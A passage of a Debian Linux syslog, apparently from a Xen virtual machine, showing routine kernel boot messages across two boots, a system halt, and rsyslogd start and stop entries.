932May 15 11:32:35 debian kernel: [ 0.910052] input: Macintosh mouse button emulation as /devices/virtual/input/input0
933May 15 11:32:35 debian kernel: [ 0.910089] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
934May 15 11:32:35 debian kernel: [ 0.912030] serio: i8042 KBD port at 0x60,0x64 irq 1
935May 15 11:32:35 debian kernel: [ 0.912048] serio: i8042 AUX port at 0x60,0x64 irq 12
936May 15 11:32:35 debian kernel: [ 0.912117] mice: PS/2 mouse device common for all mice
937May 15 11:32:35 debian kernel: [ 0.912500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
938May 15 11:32:35 debian kernel: [ 0.912651] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
939May 15 11:32:35 debian kernel: [ 0.912658] cpuidle: using governor ladder
940May 15 11:32:35 debian kernel: [ 0.912659] cpuidle: using governor menu
941May 15 11:32:35 debian kernel: [ 0.912663] No iBFT detected.
942May 15 11:32:35 debian kernel: [ 0.913109] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
943May 15 11:32:35 debian kernel: [ 0.913149] TCP cubic registered
944May 15 11:32:35 debian kernel: [ 0.913401] NET: Registered protocol family 10
945May 15 11:32:35 debian kernel: [ 0.913919] Mobile IPv6
946May 15 11:32:35 debian kernel: [ 0.913921] NET: Registered protocol family 17
947May 15 11:32:35 debian kernel: [ 0.913982] registered taskstats version 1
948May 15 11:32:35 debian kernel: [ 0.914520] XENBUS: Device with no driver: device/vbd/768
949May 15 11:32:35 debian kernel: [ 0.914521] XENBUS: Device with no driver: device/vbd/51728
950May 15 11:32:35 debian kernel: [ 0.914522] XENBUS: Device with no driver: device/vbd/51744
951May 15 11:32:35 debian kernel: [ 0.914523] XENBUS: Device with no driver: device/vif/0
952May 15 11:32:35 debian kernel: [ 0.914524] XENBUS: Device with no driver: device/console/0
953May 15 11:32:35 debian kernel: [ 0.914615] rtc_cmos 00:05: setting system clock to 2020-05-15 15:32:28 UTC (1589556748)
954May 15 11:32:35 debian kernel: [ 0.914637] Initalizing network drop monitor service
955May 15 11:32:35 debian kernel: [ 0.914715] Freeing unused kernel memory: 592k freed
956May 15 11:32:35 debian kernel: [ 0.914839] Write protecting the kernel read-only data: 4236k
957May 15 11:32:35 debian kernel: [ 0.927946] udev[78]: starting version 164
958May 15 11:32:35 debian kernel: [ 0.951102] SCSI subsystem initialized
959May 15 11:32:35 debian kernel: [ 0.952802] Initialising Xen virtual ethernet driver.
960May 15 11:32:35 debian kernel: [ 0.962944] xvda: xvda1 xvda2 < xvda5 >
961May 15 11:32:35 debian kernel: [ 0.966729] blkfront: xvdb: barriers enabled
962May 15 11:32:35 debian kernel: [ 0.966929] xvdb:
963May 15 11:32:35 debian kernel: [ 0.967282] unknown partition table
964May 15 11:32:35 debian kernel: [ 0.968819] blkfront: xvdc: barriers enabled
965May 15 11:32:35 debian kernel: [ 0.969086] xvdc: unknown partition table
966May 15 11:32:35 debian kernel: [ 0.969540] scsi0 : ata_piix
967May 15 11:32:35 debian kernel: [ 0.969713] scsi1 : ata_piix
968May 15 11:32:35 debian kernel: [ 0.969759] ata1: PATA max MWDMA2 cmd 0x1f0 ctl 0x3f6 bmdma 0xc100 irq 14
969May 15 11:32:35 debian kernel: [ 0.969761] ata2: PATA max MWDMA2 cmd 0x170 ctl 0x376 bmdma 0xc108 irq 15
970May 15 11:32:35 debian kernel: [ 0.979084] FDC 0 is a S82078B
971May 15 11:32:35 debian kernel: [ 1.176074] PM: Starting manual resume from disk
972May 15 11:32:35 debian kernel: [ 1.185140] kjournald starting. Commit interval 5 seconds
973May 15 11:32:35 debian kernel: [ 1.185151] EXT3-fs: mounted filesystem with ordered data mode.
974May 15 11:32:35 debian kernel: [ 2.289584] udev[339]: starting version 164
975May 15 11:32:35 debian kernel: [ 2.332372] input: Power Button as /devices/LNXSYSTM:00/LNXPWRBN:00/input/input2
976May 15 11:32:35 debian kernel: [ 2.332379] ACPI: Power Button [PWRF]
977May 15 11:32:35 debian kernel: [ 2.332437] input: Sleep Button as /devices/LNXSYSTM:00/LNXSLPBN:00/input/input3
978May 15 11:32:35 debian kernel: [ 2.332441] ACPI: Sleep Button [SLPF]
979May 15 11:32:35 debian kernel: [ 2.343205] processor LNXCPU:00: registered as cooling_device0
980May 15 11:32:35 debian kernel: [ 2.343475] processor LNXCPU:01: registered as cooling_device1
981May 15 11:32:35 debian kernel: [ 2.343728] processor LNXCPU:02: registered as cooling_device2
982May 15 11:32:35 debian kernel: [ 2.343982] processor LNXCPU:03: registered as cooling_device3
983May 15 11:32:35 debian kernel: [ 2.360726] input: PC Speaker as /devices/platform/pcspkr/input/input4
984May 15 11:32:35 debian kernel: [ 2.820623] input: ImExPS/2 Generic Explorer Mouse as /devices/platform/i8042/serio1/input/input5
985May 15 11:32:35 debian kernel: [ 5.629383] Adding 901112k swap on /dev/xvda5. Priority:-1 extents:1 across:901112k SS
986May 15 11:32:35 debian kernel: [ 5.775956] EXT3 FS on xvda1, internal journal
987May 15 11:32:35 debian kernel: [ 5.798673] loop: module loaded
988May 15 11:32:35 debian kernel: [ 6.580711] RPC: Registered udp transport module.
989May 15 11:32:35 debian kernel: [ 6.580713] RPC: Registered tcp transport module.
990May 15 11:32:35 debian kernel: [ 6.580714] RPC: Registered tcp NFSv4.1 backchannel transport module.
991May 15 11:32:35 debian kernel: [ 6.591513] Slow work thread pool: Starting up
992May 15 11:32:35 debian kernel: [ 6.591740] Slow work thread pool: Ready
993May 15 11:32:35 debian kernel: [ 6.591793] FS-Cache: Loaded
994May 15 11:32:35 debian kernel: [ 6.605817] FS-Cache: Netfs 'nfs' registered for caching
995May 15 11:32:35 debian kernel: [ 6.616039] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
996May 15 11:32:35 debian kernel: [ 7.490118] svc: failed to register lockdv1 RPC service (errno 97).
997May 15 11:32:35 debian kernel: [ 7.491624] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
998May 15 11:32:35 debian kernel: [ 7.492030] NFSD: starting 90-second grace period
999May 15 11:35:57 debian shutdown[2323]: shutting down for system halt
1000May 15 11:35:58 debian kernel: [ 211.362471] nfsd: last server has exited, flushing export cache
1001May 15 11:36:04 debian kernel: Kernel logging (proc) stopped.
1002May 15 11:36:04 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] exiting on signal 15.
1003Jan 17 19:55:44 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
1004Jan 17 19:55:44 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1562" x-info="http://www.rsyslog.com"] (re)start
1005Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
1006Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
1007Jan 17 19:55:44 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
1008Jan 17 19:55:44 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1009Jan 17 19:55:44 debian kernel: [ 0.000000] KERNEL supported cpus:
1010Jan 17 19:55:44 debian kernel: [ 0.000000] Intel GenuineIntel
1011Jan 17 19:55:44 debian kernel: [ 0.000000] AMD AuthenticAMD
1012Jan 17 19:55:44 debian kernel: [ 0.000000] Centaur CentaurHauls
1013Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
1014Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
1015Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
1016Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
1017Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 0000000020000000 (usable)
1018Jan 17 19:55:44 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
1019Jan 17 19:55:44 debian kernel: [ 0.000000] DMI 2.7 present.
1020Jan 17 19:55:44 debian kernel: [ 0.000000] last_pfn = 0x20000 max_arch_pfn = 0x400000000
1021Jan 17 19:55:44 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
1022Jan 17 19:55:44 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-0000000020000000
1023Jan 17 19:55:44 debian kernel: [ 0.000000] RAMDISK: 17759000 - 1803fa59
1024Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
1025Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
1026Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
1027Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
1028Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
1029Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
1030Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
1031Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
1032Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
1033Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
1034Jan 17 19:55:44 debian kernel: [ 0.000000] No NUMA configuration found
1035Jan 17 19:55:44 debian kernel: [ 0.000000] Faking a node at 0000000000000000-0000000020000000
1036Jan 17 19:55:44 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-0000000020000000
1037Jan 17 19:55:44 debian kernel: [ 0.000000] NODE_DATA [0000000000008000 - 000000000000ffff]
1038Jan 17 19:55:44 debian kernel: [ 0.000000] bootmap [0000000000010000 - 0000000000013fff] pages 4
1039Jan 17 19:55:44 debian kernel: [ 0.000000] (6 early reservations) ==> bootmem [0000000000 - 0020000000]
1040Jan 17 19:55:44 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
1041Jan 17 19:55:44 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
1042Jan 17 19:55:44 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
1043Jan 17 19:55:44 debian kernel: [ 0.000000] #3 [0017759000 - 001803fa59] RAMDISK ==> [0017759000 - 001803fa59]
1044Jan 17 19:55:44 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
1045Jan 17 19:55:44 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
1046Jan 17 19:55:44 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
1047Jan 17 19:55:44 debian kernel: [ 0.000000] Zone PFN ranges:
1048Jan 17 19:55:44 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
1049Jan 17 19:55:44 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
1050Jan 17 19:55:44 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x00100000
1051Jan 17 19:55:44 debian kernel: [ 0.000000] Movable zone start PFN for each node
1052Jan 17 19:55:44 debian kernel: [ 0.000000] early_node_map[2] active PFN ranges
1053Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
1054Jan 17 19:55:44 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x00020000
1055Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
1056Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
1057Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x00] disabled)
1058Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x00] disabled)
1059Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x00] disabled)
1060Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
1061Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
1062Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
1063Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
1064Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
1065Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
1066Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
1067Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
1068Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
1069Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
1070Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
1071Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
1072Jan 17 19:55:44 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
1073Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
1074Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
1075Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
1076Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
1077Jan 17 19:55:44 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
1078Jan 17 19:55:44 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
1079Jan 17 19:55:44 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 14 hotplug CPUs
1080Jan 17 19:55:44 debian kernel: [ 0.000000] Xen version 4.2.
1081Jan 17 19:55:44 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
1082Jan 17 19:55:44 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
1083Jan 17 19:55:44 debian kernel: [ 0.000000] You might have to change the root device
1084Jan 17 19:55:44 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
1085Jan 17 19:55:44 debian kernel: [ 0.000000] in your root= kernel command line option
1086Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
1087Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
1088Jan 17 19:55:44 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
1089Jan 17 19:55:44 debian kernel: [ 0.000000] Allocating PCI resources starting at 20000000 (gap: 20000000:dc000000)
1090Jan 17 19:55:44 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
1091Jan 17 19:55:44 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
1092Jan 17 19:55:44 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff880001800000 s90392 r8192 d24296 u131072
1093Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
1094Jan 17 19:55:44 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
1095Jan 17 19:55:44 debian kernel: [ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 129081
1096Jan 17 19:55:44 debian kernel: [ 0.000000] Policy zone: DMA32
1097Jan 17 19:55:44 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
1098Jan 17 19:55:44 debian kernel: [ 0.000000] PID hash table entries: 2048 (order: 2, 16384 bytes)
1099Jan 17 19:55:44 debian kernel: [ 0.000000] Initializing CPU#0
1100Jan 17 19:55:44 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
1101Jan 17 19:55:44 debian kernel: [ 0.000000] Checking aperture...
1102Jan 17 19:55:44 debian kernel: [ 0.000000] No AGP bridge found
1103Jan 17 19:55:44 debian kernel: [ 0.000000] Memory: 497460k/524288k available (3087k kernel code, 392k absent, 26436k reserved, 2036k data, 592k init)
1104Jan 17 19:55:44 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
1105Jan 17 19:55:44 debian kernel: [ 0.000000] Hierarchical RCU implementation.
1106Jan 17 19:55:44 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
1107Jan 17 19:55:44 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
1108Jan 17 19:55:44 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
1109Jan 17 19:55:44 debian kernel: [ 0.000000] console [ttyS0] enabled
1110Jan 17 19:55:44 debian kernel: [ 0.000000] Detected 2400.068 MHz processor.
1111Jan 17 19:55:44 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 4800.13 BogoMIPS (lpj=9600272)
1112Jan 17 19:55:44 debian kernel: [ 0.008000] Security Framework initialized
1113Jan 17 19:55:44 debian kernel: [ 0.008000] SELinux: Disabled at boot.
1114Jan 17 19:55:44 debian kernel: [ 0.008000] Dentry cache hash table entries: 65536 (order: 7, 524288 bytes)
1115Jan 17 19:55:44 debian kernel: [ 0.008000] Inode-cache hash table entries: 32768 (order: 6, 262144 bytes)
1116Jan 17 19:55:44 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
1117Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys ns
1118Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
1119Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys devices
1120Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1121Jan 17 19:55:44 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1122Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1123Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1124Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1125Jan 17 19:55:44 debian kernel: [ 0.008000] CPU: L3 cache: 30720K
1126Jan 17 19:55:44 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1127Jan 17 19:55:44 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1128Jan 17 19:55:44 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 63 no PMU driver, software events only.
1129Jan 17 19:55:44 debian kernel: [ 0.008000] SMP alternatives: switching to UP code
1130Jan 17 19:55:44 debian kernel: [ 0.024870] ACPI: Core revision 20090903
1131Jan 17 19:55:44 debian kernel: [ 0.027609] Not enabling x2apic, Intr-remapping init failed.
1132Jan 17 19:55:44 debian kernel: [ 0.027611] Setting APIC routing to physical flat
1133Jan 17 19:55:44 debian kernel: [ 0.028367] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1134Jan 17 19:55:44 debian kernel: [ 0.132003] CPU0: Intel(R) Xeon(R) CPU E5-2676 v3 @ 2.40GHz stepping 02
1135Jan 17 19:55:44 debian kernel: [ 0.132019] installing Xen timer for CPU 0
1136Jan 17 19:55:44 debian kernel: [ 0.132127] Brought up 1 CPUs
1137Jan 17 19:55:44 debian kernel: [ 0.132129] Total of 1 processors activated (4800.13 BogoMIPS).
1138Jan 17 19:55:44 debian kernel: [ 0.132599] devtmpfs: initialized
1139Jan 17 19:55:44 debian kernel: [ 0.134154] regulator: core version 0.5
1140Jan 17 19:55:44 debian kernel: [ 0.134187] NET: Registered protocol family 16
1141Jan 17 19:55:44 debian kernel: [ 0.134277] ACPI: bus type pci registered
1142Jan 17 19:55:44 debian kernel: [ 0.134781] PCI: Using configuration type 1 for base access
1143Jan 17 19:55:44 debian kernel: [ 0.134964] bio: create slab <bio-0> at 0
1144Jan 17 19:55:44 debian kernel: [ 0.180504] ACPI: Interpreter enabled
1145Jan 17 19:55:44 debian kernel: [ 0.180506] ACPI: (supports S0 S3 S4 S5)
1146Jan 17 19:55:44 debian kernel: [ 0.180517] ACPI: Using IOAPIC for interrupt routing
1147Jan 17 19:55:44 debian kernel: [ 0.264015] ACPI: No dock devices found.
1148Jan 17 19:55:44 debian kernel: [ 0.264190] ACPI: PCI Root Bridge [PCI0] (0000:00)
1149Jan 17 19:55:44 debian kernel: [ 0.270647] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1150Jan 17 19:55:44 debian kernel: [ 0.270648] * this clock source is slow. Consider trying other clock sources
1151Jan 17 19:55:44 debian kernel: [ 0.272151] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1152Jan 17 19:55:44 debian kernel: [ 0.535472] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1153Jan 17 19:55:44 debian kernel: [ 0.535913] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1154Jan 17 19:55:44 debian kernel: [ 0.536298] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1155Jan 17 19:55:44 debian kernel: [ 0.536733] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1156Jan 17 19:55:44 debian kernel: [ 0.537047] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1157Jan 17 19:55:44 debian kernel: [ 0.537049] vgaarb: loaded
1158Jan 17 19:55:44 debian kernel: [ 0.537091] PCI: Using ACPI for IRQ routing
1159Jan 17 19:55:44 debian kernel: [ 0.537927] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1160Jan 17 19:55:44 debian kernel: [ 0.537942] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1161Jan 17 19:55:44 debian kernel: [ 0.537944] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1162Jan 17 19:55:44 debian kernel: [ 0.544013] Switching to clocksource xen
1163Jan 17 19:55:44 debian kernel: [ 0.544701] pnp: PnP ACPI init
1164Jan 17 19:55:44 debian kernel: [ 0.544706] ACPI: bus type pnp registered
1165Jan 17 19:55:44 debian kernel: [ 0.616781] pnp: PnP ACPI: found 12 devices
1166Jan 17 19:55:44 debian kernel: [ 0.616783] ACPI: ACPI bus type pnp unregistered
1167Jan 17 19:55:44 debian kernel: [ 0.616790] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1168Jan 17 19:55:44 debian kernel: [ 0.616794] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1169Jan 17 19:55:44 debian kernel: [ 0.616795] system 00:03: ioport range 0xcc0-0xccf has been reserved
1170Jan 17 19:55:44 debian kernel: [ 0.616797] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1171Jan 17 19:55:44 debian kernel: [ 0.616801] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1172Jan 17 19:55:44 debian kernel: [ 0.616802] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1173Jan 17 19:55:44 debian kernel: [ 0.629103] NET: Registered protocol family 2
1174Jan 17 19:55:44 debian kernel: [ 0.629154] IP route cache hash table entries: 4096 (order: 3, 32768 bytes)
1175Jan 17 19:55:44 debian kernel: [ 0.629278] TCP established hash table entries: 16384 (order: 6, 262144 bytes)
1176Jan 17 19:55:44 debian kernel: [ 0.629319] TCP bind hash table entries: 16384 (order: 6, 262144 bytes)
1177Jan 17 19:55:44 debian kernel: [ 0.629351] TCP: Hash tables configured (established 16384 bind 16384)
1178Jan 17 19:55:44 debian kernel: [ 0.629352] TCP reno registered
1179Jan 17 19:55:44 debian kernel: [ 0.629438] NET: Registered protocol family 1
1180Jan 17 19:55:44 debian kernel: [ 0.629446] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1181Jan 17 19:55:44 debian kernel: [ 0.629540] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1182Jan 17 19:55:44 debian kernel: [ 0.629605] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1183Jan 17 19:55:44 debian kernel: [ 0.629702] Unpacking initramfs...
1184Jan 17 19:55:44 debian kernel: [ 1.002144] Freeing initrd memory: 9114k freed
1185Jan 17 19:55:44 debian kernel: [ 1.004042] audit: initializing netlink socket (disabled)
1186Jan 17 19:55:44 debian kernel: [ 1.004049] type=2000 audit(1610931219.820:1): initialized
1187Jan 17 19:55:44 debian kernel: [ 1.022606] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1188Jan 17 19:55:44 debian kernel: [ 1.023264] VFS: Disk quotas dquot_6.5.2
1189Jan 17 19:55:44 debian kernel: [ 1.023291] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1190Jan 17 19:55:44 debian kernel: [ 1.023338] msgmni has been set to 989
1191Jan 17 19:55:44 debian kernel: [ 1.023438] alg: No test for stdrng (krng)
1192Jan 17 19:55:44 debian kernel: [ 1.023465] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1193Jan 17 19:55:44 debian kernel: [ 1.023466] io scheduler noop registered
1194Jan 17 19:55:44 debian kernel: [ 1.023467] io scheduler anticipatory registered
1195Jan 17 19:55:44 debian kernel: [ 1.023468] io scheduler deadline registered
1196Jan 17 19:55:44 debian kernel: [ 1.023502] io scheduler cfq registered (default)
1197Jan 17 19:55:44 debian kernel: [ 1.023726] xen-platform-pci 0000:00:03.0: PCI INT A -> GSI 28 (level, low) -> IRQ 28
1198Jan 17 19:55:44 debian kernel: [ 1.023752] Grant table initialized
1199Jan 17 19:55:44 debian kernel: [ 1.025195] Linux agpgart interface v0.103
1200Jan 17 19:55:44 debian kernel: [ 1.025212] Serial: 8250/16550 driver, 4 ports, IRQ sharing enabled
1201Jan 17 19:55:44 debian kernel: [ 1.026935] serial8250: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1202Jan 17 19:55:44 debian kernel: [ 1.029317] 00:0a: ttyS0 at I/O 0x3f8 (irq = 4) is a 16550A
1203Jan 17 19:55:44 debian kernel: [ 1.029436] input: Macintosh mouse button emulation as /devices/virtual/input/input0
1204Jan 17 19:55:44 debian kernel: [ 1.029494] PNP: PS/2 Controller [PNP0303:PS2K,PNP0f13:PS2M] at 0x60,0x64 irq 1,12
1205Jan 17 19:55:44 debian kernel: [ 1.032600] serio: i8042 KBD port at 0x60,0x64 irq 1
1206Jan 17 19:55:44 debian kernel: [ 1.032603] serio: i8042 AUX port at 0x60,0x64 irq 12
1207Jan 17 19:55:44 debian kernel: [ 1.032657] mice: PS/2 mouse device common for all mice
1208Jan 17 19:55:44 debian kernel: [ 1.033794] input: AT Translated Set 2 keyboard as /devices/platform/i8042/serio0/input/input1
1209Jan 17 19:55:44 debian kernel: [ 1.034500] rtc_cmos 00:05: rtc core: registered rtc_cmos as rtc0
1210Jan 17 19:55:44 debian kernel: [ 1.034576] rtc0: alarms up to one day, 114 bytes nvram, hpet irqs
1211Jan 17 19:55:44 debian kernel: [ 1.034582] cpuidle: using governor ladder
1212Jan 17 19:55:44 debian kernel: [ 1.034583] cpuidle: using governor menu
1213Jan 17 19:55:44 debian kernel: [ 1.034586] No iBFT detected.
1214Jan 17 19:55:44 debian kernel: [ 1.034763] TCP cubic registered
1215Jan 17 19:55:44 debian kernel: [ 1.034827] NET: Registered protocol family 10
1216Jan 17 19:55:44 debian kernel: [ 1.035237] Mobile IPv6
1217Jan 17 19:55:44 debian kernel: [ 1.035239] NET: Registered protocol family 17
